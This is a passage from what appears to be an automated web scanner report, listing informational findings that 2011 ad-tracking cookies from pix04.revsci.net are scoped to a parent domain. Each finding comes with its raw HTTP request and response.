rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxaPzsVdi8Ni1rYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3w4B4lBCjXwQIbR0jlRnTHgpk5f1sQGfmFmyVEtx+gxjLU3wnYgttSfhxMbzfydi3AAGoKvCmxF7TxORX1mqADXOanLZaz6sJGSEz90RB0KeOifwnURRHhCsVk3w6bNETq9nc+k2ll9KMbb8sWgiVgH2Zd335WJFX18Hy2/BgZNsf9NM8irA1uZi6UJW+DKzXg+99MdH2//xFgX+ZPOQDsoy9Be8AFAdjuskLYUDxsUlNhyqQaWwGvJyuAuf0Ss2l0uH6jvt4FcFbTkZBk9q7caxdxw2TJZQfbfDKhb2bpjeGdZoqJ44fCKH3DoxpfXBIW3ohUSVLFElW2dztek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0tnXPvFFCQ2Evk4Yarbh4YiTvgdw/8E5sj9TdpiToNMPKRMu250cwirAHBwhZoo9S04egkJIm5Tk0Su5s9KFZoDc41rkgS7pZnikG/LfPzPlgEjldlohervfYVZ/LaMjmJuZfR6SZUqtPVd8O7nMqgFt6bf4Md0jAFU3IbNqPuCHHS/cEp3nCnspLAR4e1R+gGitqEYVA+JOiq4sp+fRtOiU1jtoQ4FRVaJP/03I9PtH0VkJpFhL7CuayYoDhdKu0ByWZy+KTL1v/OQpmY1nftZfGOHQjKSF2P1zTGfEpRqL2kw=="; rtc_d1yn=MLuB648HgV9DFVRAcMKRV8BItq+wLgaJCK6wgl48oj9LoBSPJndTC+3SWz6oSpsoBhz2GNjcf7S7fSphFBYcKsIf2/9slCRRHs5A9NFuqZhZbQLdIFwm9RF6U8URf2N/KH0qGR1QY3DxZLycbLU=; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtlR8qmZ5EYm2QQMyGpObby6k11tNu345vUZaCKjYPpg7DctEzT/YmvwSV+h+zyWJPM6bhzBtArAADE6trLuK01RUTHtoDIZGMfgWkONiixNKs3XuqReSNH/gBjg==; udm_0=MLv381MJZihn557Fg9CgawbiVA1lL/FuRN2YvTxnLmFE6w8NbGJPaUPFCwsFgR3sv7657LwRKNAmXEh2aSb0Zv5bckFYISl1fyfVVAwqoQYt9FhqVjQGjuSl8z6Qv6cnv53ckanPEOOXZwkn9RV/ihHtOHpoTy2LVEsR1+0TtypJG/O4klSyrU9gYKd0fFdaupz4d8b9Rxi9djrm40BWjcIFDUCw9gcW5BQs/64wXLGemKagzfYsk+Be/OQ5xaBZaSj3b4jGGpgM2F1qkr0iYXTLNphhYma6fAml/0UvewxClD7zldQ+WamH9ng0nRYrjN3PcYJlfkkul9U4BAGhifhxBj1sv6C4RRL6UBTL2KUx9T8V8YFXz7YPDtGbM6sgCs3RB0SA0ycbHqx2WVsbyLukuWo7YvdldaMxV/fshebvGXE1IKazvSkswdMfyeVYT15UrtqFCLGABTryXWv1F+XgNgqFTFNm1drz5UX6WcHHivrY2QGkCz6fiXlqtAAj2PQTrzRvQYY3+HAqdC/dwE6FNus7vDx+1K0MO1Vn1WWhUby27gM/6Lvnw+nLSKBM9mlSNVmKh4Cl1j5OW52264m48pkDKKkPrWJxRKzTa8xhzae+N2XhA3eQHMYIuSfo6DKhiNWS8b6W6n7VDBCgOJVgcqeSwyQO9riL8Y+OBI7v42chasKmrve6popZvLjbjISWE/8fGIxOEnCWfaty7H8syDJC8iLF+r2Pk9zRn7S7inz1SkdFk46H89ZroiU3qJ8F4oMHF00Dqpt0O0HkGEPMNMCBv6ze8LvUmIjdewmx8LI2ISHGcVDcWQcRml0Ptz3tmYMOzEcNnD/OWoGqhyV5W6e32jcAAG35EbiTDNfnpMuUqc30dB9i8xri9Uidkc3TiOUOJ3qWTz5ZJEKhbm4X9u7mxzmpya1rCbaVfzsAA6Q=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNfcPG7gMUFVJGSXAru+PspYp8Zh1vxU4kHQpvTJd5E38Uby8gAQtSL0j8UFK4h8IFpXuZrLSfteXArmPZg/O+tDYVt4DWBmlQuQeNBWHL0M3bZxr/7kbDaukbHXsevvyz0uHQn4wL4sXXo9zC07YrXswS3ctuzx/w1oQEEUBiG7Fkd+08Z0a0Aq8+neXrJjEYTyoXD7O/9BSRxw==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:24:04 GMT; Path=/
Set-Cookie: rtc_kCmS=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:24:04 GMT; Path=/
X-Proc-ms: 18
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:24:03 GMT
Content-Length: 699

/* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */
rsinetsegs=['E06560_10273'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-
...[SNIP]...

15.52. http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E06560/b3/0/3/0902121/480772802.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNfkPF7gMQFmJWL5j/WBXspbqHMesZyDAPtJdoj9JykQ4ej5YiARKcvgOUaU7WmpZ+xn8NESHRFNNSzd1GRfHGtEbUp0AXZklOsdH4xbjJ0s37Wwz/7kTDdI8G8cutk1H7VJNJsHaPA/N8TPyic0kdBJO4QAB0haFFqoQVy5YUeyCAV3xISpG+5m6Vkmmgxmt5q0OaCcFKWkm3; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:33:41 GMT; Path=/
rtc_2CEm=MLuBq44HAVpDE1RBdcKR9wRKtq+wIgaJBK6wovjkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jVUOEA+YtTPI8JufG9qk+49XXbra2qlylkpqQO52MR8g/svwiZ/saCvRqEgZsRMRhxaFgNrFkokeURuaSlOMqC2ElhxVA7leaNnGoNkf6JjSJknQc1oDhVGXzxjcD95Kk8prg37AEdom8BXLQ==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:33:41 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E06560/b3/0/3/0902121/480772802.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.telegraph.co.uk%252Fsponsored%252Ftravel%252F8509794%252FWin-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html%253FSite%253DTelegraph%2526Level1%253DSponsored%2526Level2%253DTravel%26DM_REF%3Dhttp%253A%252F%252Fwww.telegraph.co.uk%252Fsponsored%252Ftravel%252Fdisney%252F8509938%252FDisney-Cruise-Line-A-world-of-entertainment.html%26DM_EOM%3D1&C=E06560 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; rtc_UHo_=MLuBO6ytt4kWQAcYCwq3qlH2P+30140FoDv9+NdncqBQj/1APVcs2RqcRviu0av4WWcZXFrnmShpmUFNkxcI1lVga5DEYLjt+rPllAsXSkoHU+SpXid9gcNqqckod7jZ+IG6PS181iZxYYIvYB4eK0D4aTm7q9jqzJHiflgw8z1r8HdO4onVL/kFl+VQvpPqyxbKsVJrbCT+bPHQXS6ebsYXxmK4FnjrE4/mK9V3esZNESwzbK8UcHD218qpzfioZantZ0n9GFB24T1Ber5rWLSYFX55Y6/jLDh5fbGxQbnUAtnwmbFRfX9DW2n2GEn3U+Sjci+yMKc=; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPNfUPF7gMQVVNGSawlKW6gjRBZYxxiBC1EXRroIbFxLjNdWsobEQsSoI7bJcXfd3Q8xG/msB/B7MPLxEX2yS19esHhvOoON8TS8BQERMain854Alz83lDRgd6xFFhJNivjTADXwVNRSww/FP9UowA/ps0S3KJU5tPyjPapCZ1zXnNqV3zIu8Li3FuOLY9x+s/B; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsiPus_BLx4="MLuBMx5WwltEVdJC1pDHXxVVQRFSxZB5VVzGA0eXFxQcE0JTcx0dirKNGop7i3XWDJHAwWnEaPQ9fNAxXZoA8/8PjlMc7Rmq6pHKV9dfOq4UuKXPN1ZZfdb4QpUwGqAO+OCDHeAhdko/CShNKCtK+cJuA39RRiUFLEo158Lmhann+darz9bvxtz7gcXhyuK74OXz+tfmpcL4qeXtQEc3FBEZA0Y9w8Ds4JnR4+CR0d75se3k2qHR9qnp1Ojg1Yntw9yL8vzqA6XjOXYCH4g8dVAmLcJzZqI="; rsi_us_1000000="pUMdJU2nPxIc1A0uRFq1L452dVC/QETZf/HOd0B8CQps9m6JOqMIaNSjwYfr4FllW84PaOzq3bONHMCHtzH0+EEe5tma6B4jMxDFmz2HFWZfxoRVNaSQJNagVTxXeAzn+thHi3BNWMRQH/Cpa+z8q0mS6wiDsIWHFQy3z+QkaLyihsGAiDN8TjmuqvH5lEQ7dRWTBSFI4PnhwqOOKqhNiz/042NJXfe7BaDuvhPU9ofbNkB6bsXOwgLeks9Q45jFLX2kKc3sz4tQg1DvrhtUnIkmNJMQ97mZyikGni4zo2btb91s7zB5iI6xI3ojuqfmm98G7EojnMVUwLK5XLeP6oRjUIdf09HwxqPYbVlLWDrpzzz0n8g1aoXZbw9WTjEmGX3pgwpkM59rI/DkYw3KJrHXRoJo+RWWfb9w/7suQ5wTVynJ/BYwChtcgqV87Sk8C228WkPhegHs6e2GZ0ZZnWKiCIra7fG/6yVwsqceu1WBx6iiENgvfNVj9q/ngBRiqQ04wUPz0I+BfyRVb3fddl0n5cS1oxTiyfGDuJcO5hxeqT02wIxgDmfYCz8PB54vjsj5zsFABcLWQsb9r00VxDszyECk3SjMGZDEfyKRRQ0a1ETvWbgXIoBiU2tUyCR207NeXKHFcIS0bh1rqy4kEIrpLYt7Hx/l90yhqHO4ZpqSuG/wmkGp0/tN8uLtNQygojRQBieVSFNFMPn5tR3+VqzXvU3br4og4lzIo7zBl0Jz4NUUKwj6uoG390nHNCbmccrIGoyWn0wYVlMGRafly2QOkA9ZGtskz0VySOgelM53ayoWinl5zo/GwOnmK+kl5Fr96bVlxekKMedoJqdThAtOPaNBoKMtloWOAQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6axN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNfkPF7gMQFmJWL5j/WBXspbqHMesZyDAPtJdoj9JykQ4ej5YiARKcvgOUaU7WmpZ+xn8NESHRFNNSzd1GRfHGtEbUp0AXZklOsdH4xbjJ0s37Wwz/7kTDdI8G8cutk1H7VJNJsHaPA/N8TPyic0kdBJO4QAB0haFFqoQVy5YUeyCAV3xISpG+5m6Vkmmgxmt5q0OaCcFKWkm3; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:33:41 GMT; Path=/
Set-Cookie: rtc_2CEm=MLuBq44HAVpDE1RBdcKR9wRKtq+wIgaJBK6wovjkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jVUOEA+YtTPI8JufG9qk+49XXbra2qlylkpqQO52MR8g/svwiZ/saCvRqEgZsRMRhxaFgNrFkokeURuaSlOMqC2ElhxVA7leaNnGoNkf6JjSJknQc1oDhVGXzxjcD95Kk8prg37AEdom8BXLQ==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:33:41 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:33:41 GMT
Content-Length: 699

/* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */
rsinetsegs=['E06560_10273'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-
...[SNIP]...

15.53. http://pix04.revsci.net/J06575/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNcEPF7gMQFmJWL/bIkVOGmUWyin9f4qPlqVyo9gAwLzNdWsobEQsSoI7bJcXf99+4jWR4Dlls5n9FBzORIioqvrBy6Fm6ao1z467/rY3cyf1F0Qb/zZOSoe+8Rsne2QXDMcCDc0xGZ8Qy3gbow6eZ6r/AoSRkOii3Em8CTaj7ZKHmv8gw9McWyGxb/IoIyQU=; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxaPzsVdi8Ni1rYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3w4B4lBCjXwQIbR0jlRnTHgpk5f1sQGfmFmyVEtx+gxjLU3wnYgttSfhxMbzfydi3AAGoKvCmxF7TxORX1mqADXOanLZaz6sJGSEz90RB0KeOifwnURRHhCsVk3w6bNETq9nc+k2ll9KMbb8sWgiVgH2Zd335WJFX18Hy2/BgZNsf9NM8irA1uZi6UJW+DKzXg+99MdH2//xFgX+ZPOQDsoy9Be8AFAdjuskLYUDxsUlNhyqQaWwGvJyuAuf0Ss2l0uH6jvt4FcFbTkZBk9q7caxdxw2TJZQfbfDKhb2bpjeGdZoqJ44fCKH3DoxpfXBIW3ohUSVLFElW2dztek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0tnXPvFFCQ2Evk4Yarbh4YiTvgdw/8E5sj9TdpiToNMPKRMu250cwirAHBwhZoo9S04egkJIm5Tk0Su5s9KFZoDc41rkgS7pZnikG/LfPzPlgEjldlohervfYVZ/LaMjmJuZfR6SZUqtPVd8O7nMqgFt6bf4Md0jAFU3IbNqPuCHHS/cEp3nCnspLAR4e1R+gGitqEYVA+JOiq4sp+fRtOiU1jtoQ4FRVaJP/03I9PtH0VkJpFhL7CuayYoDhdKu0ByWZy+KTL1v/OQpmY1nftZfGOHQjKSF2P1zTGfEpRqL2kw=="; rsi_segs_1000000=pUPNfcPG7hMUFmJSL/a6Tc2cVgtigl9iBC1EXVoovPAwnmKsOWQJ/ULPGqLC16G0T17iRicC5KARkwTsTN8ioePPguoJ741/DK1Cmzf3MeNCyP1GEAb//VXLu/54y0XW2Qc7M45GdUJiNdjHq/ZtHS6Ghn8KrCU4potT0MwJAi0TACPm038iu2F90zRFvW2tyQA=; rtc_ac8M=MLuBq44HAVpDE1RBdcKRB7ZxEIAJXzMpNIiX6/DkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jVUOEA+YtTPI8JufG/Cre49XXYBRXzYUblcveQ2ugG0KGJ2zDaCaA59xBUJAUsWH2wHE3djRDcpNER26fldZTABDtd4uTBdzX9g62NQniwGxHVABktEbzdrInhjUjr8DeZHE2mPTEUo; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39VEJbipn5t4pnpAaFXny/BhBCiFsbAsAnLzSYTlgg0qTOJ+Mg3DlTMEXAQTOD+7Yub7r0vZBjStqSHp0DWUhACTwZ3EiouT1cmm7wklDaOK/14Aj81c0EIOAjVSJNQ3/EJasmJU7rIdacNN0Suber3u8hlyARHsvpr0/LOSJS6bFYRSzZNKzSNQAzR12RlrciVdiZGvbIO0IrHQN6IZ5RFd0d+GqL8fZiTJZzaFjB+mKwrW9Wtwfhvi6ZzgvwXVFc+8JUgmysmlVasU4dDPRH48UbqWeyhogknLvpE7T0uymnntOnjnUXYFW/gUDr4tsrPjdAj+g49LnF7JczoY0qriSWVTmX/9B5mXyqikERRR7Wk7BtStxYE6DJh0PbDCcxaExS8LGEDu8qSMID8Jwyb+Wm4s0zH0JSE0XV2nhS+EsFzU0qn7qYVG23LOB5WEU5xepu5cA0xJ15e1tB8J0GRlXzkb1KB1wlRBGbef7TwTAltx9qrUQVr1AuDuQX3A2xbSkLeLGxARQdRtsBmY05cVPkBSIV+Ssvkd96r0ZhIBj/lNu8kK8QaokX0MDpeEz1F0u2r7Zz49jYSa3dq+PqSLFM1ySnu9PCyy02UBe92k9yjvyGFIH4lJT7rLmIikjqCRY7GUquZfOvqj/aBChSK1DHpMhLWCDF9rXnxOpnedFSOU6h5luF/mpBF2BtCkXKBeorKv7uk3WitFqzV0IC9C9BgWCUuGYfxFUgsaY2A6YyhSXKh7JqmH7Z2Twza28z3IU4s0pNAp8HN1BpbB/X82OpsvUtU9bmLPStjKw/l0cG+hCVLfXNEztRuMAXnSlSjgVHLN603CKv7wJcZ0a/VW8Og0VckJS3ggd3pkXtDl6sJAZyl8giiba1xEYmHGvdZOt4P5CUOc/cgqc3kEWkbycO4mTQjBUqxR65jDm+aIZ24qdnNdfSouAtwoNLfZUrmJJfoO04g2sewVltiFk6CJ9OrVqxL8g/cQ5sMLgAN9nx/vu1w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNcEPF7gMQFmJWL/bIkVOGmUWyin9f4qPlqVyo9gAwLzNdWsobEQsSoI7bJcXf99+4jWR4Dlls5n9FBzORIioqvrBy6Fm6ao1z467/rY3cyf1F0Qb/zZOSoe+8Rsne2QXDMcCDc0xGZ8Qy3gbow6eZ6r/AoSRkOii3Em8CTaj7ZKHmv8gw9McWyGxb/IoIyQU=; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:12 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:11 GMT
Content-Length: 671

/* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3
...[SNIP]...

15.54. http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/b3/0/3/1003161/817295946.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFOUnFbnIQVp3RUOz/VGQbp+XT5PhqGi77X3Z4RpparcWHKeV86Lli0TAjp7sD2wsNjeiiHejHOOvj0jdLCjKDn6QOlaUki40+l7YGOxttCDhojwZFfSdbSG6auv+NtQaLeK6yjaSOcn/tIVqutnj5ehklArgmMZQWDPA+LFxsMUIfDd8xp54waV696ckFp0yQyokMqd9T2L+UDYdqcGpMN/s2So1wlKDU/Revqkw6Wg==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:15 GMT; Path=/
NETSEGS_G07608=82f4957c1a652091&G07608&0&4df56737&4&10004,10009,10016,10017&4dcf3a10&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 13-Jun-2011 01:26:15 GMT; Path=/
rtc_ErQC=MLuBq44HAVpDE1RBdcKRB7ZxEIAJXzMpNIiX6/DkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jUufJX42H6lKalhpctVQdkk4LWk10paZnCbr7pphQVva5XAHuMOfH7hyPpHBVYDsCDk9EsrB0ZgEAryJ99wLm75fG8zGQ5teImxCmKodBhXEA8k31zoz1YZt65mkSjxQo3twQuAEERdUBJzh5UdZw6wo7xveqZ3lm3WEmujdRpphTE3a9snWeE7MQjvo/mrpri5/KWuJu3royXntZOFYaAOqPyMa1fhvwito9Fk4RzmKcPrO+rku7aj4KKnIu78UXRDpm9lVsN+mg==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/817295946.js?D=DM_LOC%3Dhttp%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxaPzsVdi8Ni1rYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3w4B4lBCjXwQIbR0jlRnTHgpk5f1sQGfmFmyVEtx+gxjLU3wnYgttSfhxMbzfydi3AAGoKvCmxF7TxORX1mqADXOanLZaz6sJGSEz90RB0KeOifwnURRHhCsVk3w6bNETq9nc+k2ll9KMbb8sWgiVgH2Zd335WJFX18Hy2/BgZNsf9NM8irA1uZi6UJW+DKzXg+99MdH2//xFgX+ZPOQDsoy9Be8AFAdjuskLYUDxsUlNhyqQaWwGvJyuAuf0Ss2l0uH6jvt4FcFbTkZBk9q7caxdxw2TJZQfbfDKhb2bpjeGdZoqJ44fCKH3DoxpfXBIW3ohUSVLFElW2dztek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0tnXPvFFCQ2Evk4Yarbh4YiTvgdw/8E5sj9TdpiToNMPKRMu250cwirAHBwhZoo9S04egkJIm5Tk0Su5s9KFZoDc41rkgS7pZnikG/LfPzPlgEjldlohervfYVZ/LaMjmJuZfR6SZUqtPVd8O7nMqgFt6bf4Md0jAFU3IbNqPuCHHS/cEp3nCnspLAR4e1R+gGitqEYVA+JOiq4sp+fRtOiU1jtoQ4FRVaJP/03I9PtH0VkJpFhL7CuayYoD